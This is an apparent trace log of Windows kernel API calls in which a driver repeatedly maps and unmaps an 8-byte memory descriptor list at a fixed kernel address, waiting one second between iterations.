| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002f278a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f278a40, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002f50ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f50ea40, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002f5b3a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f5b3a40, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002f6ada40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f6ada40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00033974a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00033974a40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00033e3fa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00033e3fa40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00045bdca40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045bdca40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0004a6f7a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a6f7a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0004a7fda40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a7fda40, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd000292a1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd000292a1a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029628a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029628a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029629a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029629a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002962ca40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002964ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002964ea40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029676a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029676a40, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002987ca40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002987ca40, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029897a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029897a40, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bc64010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bc64010, MemoryDescriptorList_unk_out = 0xffffe0003bc64010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bc64010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029aa1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029aa1a40, MemoryDescriptorList_unk = 0xffffe0003bc64010 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bc64010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae679b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae679b0, MemoryDescriptorList_unk_out = 0xffffe0003ae679b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae679b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029aa8a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029aa8a40, MemoryDescriptorList_unk = 0xffffe0003ae679b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae679b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473ff4f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473ff4f0, MemoryDescriptorList_unk_out = 0xffffe000473ff4f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473ff4f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029aafa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029aafa40, MemoryDescriptorList_unk = 0xffffe000473ff4f0 |
| IoFreeMdl | Mdl_unk = 0xffffe000473ff4f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461f8db0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461f8db0, MemoryDescriptorList_unk_out = 0xffffe000461f8db0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461f8db0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029dcea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029dcea40, MemoryDescriptorList_unk = 0xffffe000461f8db0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461f8db0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029de8a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029de8a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a061a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a061a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a07aa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a07aa40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a0a0a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0a0a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a0a2a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0a2a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a0c3a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0c3a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a26fa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a26fa40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a275a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a275a40, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
